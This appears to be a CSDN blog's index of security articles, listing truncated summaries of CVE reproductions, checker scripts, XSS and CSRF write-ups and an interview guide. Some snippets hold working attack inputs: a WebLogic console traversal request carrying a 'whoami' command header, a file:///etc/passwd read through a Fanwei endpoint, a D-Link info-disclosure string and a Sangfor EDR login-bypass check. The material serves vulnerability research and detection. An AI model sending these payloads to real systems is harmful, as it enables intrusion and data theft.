安全
文章平均质量分 70
ATOM_123
这个作者很懒,什么都没留下…
展开
-
XSS完整利用过程
XSS,wiki的解释是一种代码注入,所以能做的事情很多,不限于alert弹框(感觉很多人以为XSS就是弹框框,弹不出来就不认)、窃取Cookie之类的操作,下面要实现的水坑攻击就是一种利用。过程:1.利用JS写一个诱导页面,不要再用flash更新页面了,都被人家玩剩很多年了...我写了个页面,抛砖引玉,一个是模仿chrome浏览器崩溃后的页面,另一个是使用layer的弹窗页面。代码一,chrome浏览器崩溃页面:var body = document.body; var _原创 2021-05-19 16:53:59 · 678 阅读 · 0 评论 -
CSRF漏洞检测与发现
1.首先明白什么是CSRF漏洞跨站请求伪造,这里刚入门的同学肯定不明白是什么意思,其实重点在于请求伪造简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。在CSRF的攻击场景中攻击者会伪造一个请求(这个请.原创 2021-05-17 11:29:29 · 2727 阅读 · 1 评论 -
CVE-2021-26295 Apache OFBiz rmi反序列化 漏洞检测脚本
漏洞描述:Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。2021年3月22日 Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞(CVE-2021-26295)。攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。JMI解读:Java RMI服务是远程方法调用(Remote Method Invocation)。它是一种机制,能够让在某个java虚拟机..原创 2021-03-28 11:50:04 · 1180 阅读 · 0 评论 -
网络设备:IPS,IDS,waf,SOC
IPS 入侵防御系统(Protect):而入侵防御系统(IPS)却能有效地阻止攻击行为的发生,因为所有的网络流量在达到目标服务器之前,都需要流经IPS。所以在没有得到允许的情况下,恶意软件是无法触及服务器的。IDS 入侵检测系统:是一种通过实时监控网络流量来定位和识别恶意流量的软件。在网络系统中,IDS所处的位置是一个非常关键的设计因素,IDS一般会部署在防火墙之后,当攻击发生时,入侵检测系统只能发出警报,它并不能防止攻击的发生。基于主机的IDS只能够监控一个系统,它运行在你需要保护的主机之中。原创 2021-03-26 23:34:26 · 1686 阅读 · 0 评论 -
信息安全工程师(漏扫方向)面经
1.linux下查看进程情况(例如我正在跑python脚本)ps -ef |grep "python3.7 0227_cgy_http_scan.py"cat /proc/107171/status2.linux tcpdump抓包指定ip截获主机210.27.48.1和主机210.27.48.2或210.27.48.3的通信tcpdump host 210.27.48.1 and \ (210.27.48.2 or 210.27.48.3 \) 3.python字典的..原创 2021-03-02 18:48:16 · 633 阅读 · 0 评论 -
自用CMS指纹识别
写了个指纹批量识别的工具,用的协程,排坑排了一周,现已稳定运行运行截图:指纹库还在更新中......更新完成后项目提供给大家下载原创 2021-03-02 10:23:44 · 1324 阅读 · 0 评论 -
通达OA v11.7后台SQL注入
这次复习一下SQL注入,好久都没弄过这个了,拿已知的通达OA 的漏洞下手首先下载安装一下通达OA V11.7版本查看源码,发现都是乱码,都是经过zend加密的,需要解密。解密工具可使用SeayDzend代码审计发现注入首先判断$condition_cascade是否为空,如果不为空,则将其中的\\\'替换为\'再查看exequery函数因为是无回显机制,是盲注(盲注的核心是:substr、if等函数)传入错误的SQL语句时,页面出错:(id=1%..原创 2021-02-19 11:33:19 · 572 阅读 · 0 评论 -
CVE-2020-1472复现过程(不需要输入DC Name)
环境搭建Windows server 2012R2IP:192.168.146.183漏洞利用使用mimikatz进行检测使用mimikatz进行密码置空在大部分网上所给出的脚本中,发现DC Name需要手动输入,根据系统命令的调用,发现通过系统命令可得到局域网内主机的DC NameWindows:Linux:检测脚本(仅检测,不具有破坏性)可调用系统命令得到局域网内DC Name:在使用检测脚本时,要求impacket库版本为0.9...原创 2021-02-10 11:56:39 · 340 阅读 · 1 评论 -
phpStudy nginx 解析漏洞
此漏洞爆出的是早在2017年就爆出的nginx文件解析漏洞利用方式:xxx.png/xxx.php首先准备文件11.png,内容为: <?php phpinfo() ?>在浏览器中访问http://127.0.0.1/11.png显示图片解析错误。在浏览器中访问http://127.0.0.1/11.png/.php,显示:“Access denied.” 。这就有意思了,test.jpg是文件不是目录,test.php更是根本就不存在的文件,访问/te...原创 2021-02-08 19:35:55 · 385 阅读 · 0 评论 -
Jumpserver漏洞检测脚本
漏洞详情:https://www.cnblogs.com/w0x68y/p/14340249.html采用的是websocket协议可以先从这儿了解一下websocket :https://blog.csdn.net/larry_zeng1/article/details/82285265我们先对报文进行抓包:...原创 2021-02-03 10:22:14 · 539 阅读 · 1 评论 -
禅道<12.4.2版本任意文件可上传
简要概述 对“禅道<12.4.2版本任意文件可上传”的极高危漏洞,进行了详细的复测。前提利用条件与实际测试 1)必须是登陆的状态下,才能上传文件成功 2)网上的POC形式1(4台机器测试均未成功): http://x.x.x.x/zentao/client-download-1-<base64 encode webshell download link>-1.html 备注:此处的BASE64编码明文为:f...原创 2021-01-29 19:36:36 · 1875 阅读 · 0 评论 -
Drupal 远程代码执行漏洞 (CVE-2019-6339)漏洞分析
简介Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。漏洞概述Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。远程攻击者可利用该漏洞执行任意的php代码。在Drupal的机制中,有一个规则:如果出现同名文件,就会在文件名后面加上_0,_1,并且会递增。例如:phar stream..原创 2021-01-19 15:38:02 · 532 阅读 · 0 评论 -
S2-061(CVE-2020-17530)
环境:https://github.com/vulhub/vulhub/tree/master/struts2/s2-061POC:POST /index.action HTTP/1.1Host: 192.168.1.107:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53原创 2020-12-15 10:07:35 · 271 阅读 · 0 评论 -
CVE-2020-10977复现过程
老规矩上一下漏洞详情漏洞详情:GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。POC:#!/usr/bin/env python3import sysimport jso.原创 2020-11-30 16:12:49 · 1850 阅读 · 2 评论 -
CVE -2020-13942 (Apache Unomi 远程代码执行漏洞)复现
一、漏洞描述:Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞..原创 2020-11-24 15:42:44 · 975 阅读 · 0 评论 -
CVE-2020-13957|Apache Solr ConfigSet API未授权上传漏洞
下载CVE-2020-13957影响范围: Apache Solr 6.6.0 to 6.6.5、7.0.0 to 7.7.3、8.0.0 to 8.6.2官方下载地址:Apache-Solr,本次漏洞复现下载影响范围内的8.0.0,解压既用。不挂代理下载实在太慢,于是我就上传了一份:https://download.csdn.net/download/weixin_39811856/13162062启动该漏洞需要以cloud模式运行Solr,同时Solr-API不能开启认证进入solr原创 2020-11-23 18:21:28 · 461 阅读 · 0 评论 -
CVE-2020-11989:Apache Shiro权限绕过复现
漏洞概述Apache Shiro 1.5.3之前的版本中,当将Apache Shiro与Spring动态控制器一起使用时,精心编制的请求可能会导致绕过身份验证影响版本Apache Shiro < 1.5.3环境搭建项目地址:https://download.csdn.net/download/weixin_39811856/13129895/test/需要登录后才可访问,未登录访问则会自动跳转:但是当访问/;/test时便可以绕过shiro认证查看需要登录认.原创 2020-11-20 14:04:18 · 1754 阅读 · 1 评论 -
CVE-2020-14750脚本编辑时遇到的问题
遇到了一个问题,首先贴上POCPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1Host: 172.16.242.134:7001cmd: chcp 65001&&whoami&&ipconfigUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85...原创 2020-11-11 17:51:22 · 1032 阅读 · 0 评论 -
CVE-2020-14882有回显payload
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1Host: 192.168.146.188:7001cmd: chcp 65001&&whoami&&ipconfigUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safa...原创 2020-11-11 14:33:16 · 644 阅读 · 0 评论 -
[CVE-2020-14882] Oracle WebLogic Server身份验证绕过
/console/css/%252e%252e%252fconsole.portal原创 2020-11-10 14:45:45 · 439 阅读 · 0 评论 -
CVE-2020-14883验证
[CVE-2020-14883] Oracle WebLogic Server认证的远程代码执行(RCE)基于windows的受攻击对象:tangosol.coherence.mvel2.sh.ShellSession()POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1Host: vulnerablehost:7001Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 ..原创 2020-11-10 13:38:42 · 3436 阅读 · 1 评论 -
CVE-2020-14882 weblogic 未授权命令执行复现及分析
简介该漏洞通过HTTP协议进行利用,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限。环境搭建windows server 2012weblogic 12通过宽字节安全的分析来看(调试源码):http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi")...原创 2020-10-30 10:52:21 · 966 阅读 · 0 评论 -
Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现
一、漏洞简介:ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。二、影响范围:Thinkadmin版本小于 ≤ 2020.08.03.01三、漏洞复现:利用POC去打(burp直接放包不能成功回去.原创 2020-10-29 09:36:08 · 937 阅读 · 1 评论 -
CVE-2020-16898 Windows tcp/ip远程代码执行漏洞复现以及分析
受影响版本Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Versi原创 2020-10-27 15:30:48 · 983 阅读 · 0 评论 -
CVE-2020-1472 域内提权复现
1.利用流程漏洞利用流程如下:1、 置空域控保存在AD中的密码2、 获取域控用户HASH3、通过获取到的管理员HASH得到一个SHELL2.安装最新的impacket:https://github.com/SecureAuthCorp/impacket注意:不要下载tags里面的,tags里面还是3月份的!3.漏洞利用:1)置空(置空的不是管理员账号密码)2)使用空密码dump域控上的hash如图:WIN-I0E7JQ4II7A$用户hash已被替..原创 2020-09-22 17:23:51 · 491 阅读 · 0 评论 -
泛微云桥任意文件读取漏洞复现[09/18]
1.老规矩,搜寻目标机器(xpath用起来确实很方便)2.根据网上的POC试试:GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1User-Agent: curl/7.29.0Host: xxxxxAccept: */*3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍:发现这个好像有戏,没有/etc/passwd,并且还是原创 2020-09-18 15:36:30 · 1450 阅读 · 2 评论 -
华硕RT-N13 QIS_wizard.htm 任意密码绕过
影响产品:Asus Routers (DSL-RT-N13 , DSL-N14U B1)漏洞复现: 1、查找目标机器 2、测试POC3、登录验证原创 2020-09-04 15:28:25 · 328 阅读 · 0 评论 -
D-link DIR-610 CVE-2020-9376复现
漏洞编号:CVE-2020-9376漏洞原理:D-Link DIR-610设备允许通过SERVICES = DEVICE.ACCOUNT%0AAUTHORIZED_GROUP = 1到getcfg.php进行信息披露。注意:此漏洞仅影响维护者不再支持的产品。漏洞复现:...原创 2020-09-02 14:18:27 · 951 阅读 · 0 评论 -
深信服EDR任意用户登录0day检测
import sysimport requestsimport argparsedef check_bypass(url): if '://' not in url: target = 'https://%s' % url if ':443' in url else 'https://%s' % url else: target = url target=target+r"/ui/login.php?user=admin" resp.原创 2020-08-20 12:38:12 · 901 阅读 · 0 评论 -
冰蝎3.0 页面存在,但是无法获取密钥
下载链接:https://github.com/rebeyond/Behinder/releases此次改版较大,更新日志:我在尝试时PHP马时,一直都在报错:于是我去github下查看issues结合别人的回复,我查看自己php版本:5.7使用docker搭建apache+php7.0https://www.jianshu.com/p/81ad5fe91866连接成功...原创 2020-08-18 13:44:57 · 8281 阅读 · 3 评论 -
实战靶场整理
0x00 前言在学习渗透测试的过程中,光学理论知识是不够的,还需要结合实战来进行学习。但是国家法律是不允许我们对互联网上的web站在未授权的情况下进行渗透测试的,所以我们只能通过自己搭建环境来进行学习。下面给大家分享一些靶场,免得大家再去寻找。0x01Vulnerable Web ApplicationsBadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butt.原创 2020-07-22 10:35:41 · 2179 阅读 · 0 评论 -
CVE-2020-8840复现
0x00 漏洞概述FFasterXML/jackson-databind是一个用于JSON和对象转换的Java第三方库,可将Java对象转换成json对象和xml文档,同样也可将json对象转换成Java对象。此次漏洞中攻击者可利用xbean-reflect的利用链触发JNDI远程类加载从而达到远程代码执行。0x01 环境搭建搭建一个web服务器,我们采用python3在web服务器目录放上已经编译好的恶意类恶意文件内容为:启动ldap服务 这...原创 2020-07-01 17:50:23 · 3019 阅读 · 0 评论 -
CVE_2020_0796重大windows SMB RCE漏洞
描述如下:漏洞是因为操作系统在处理SMBv3协议中的压缩数据包时存在错误处理。 成功构造数据包的攻击者可在远程无验证的条件下利用该漏洞执行任意代码。易被感染系统: + Windows 10 Version 1903 for 32-bit Systems + Windows 10 Version 1903 for ARM64-based Systems + Windows 1...原创 2020-03-13 10:05:47 · 530 阅读 · 0 评论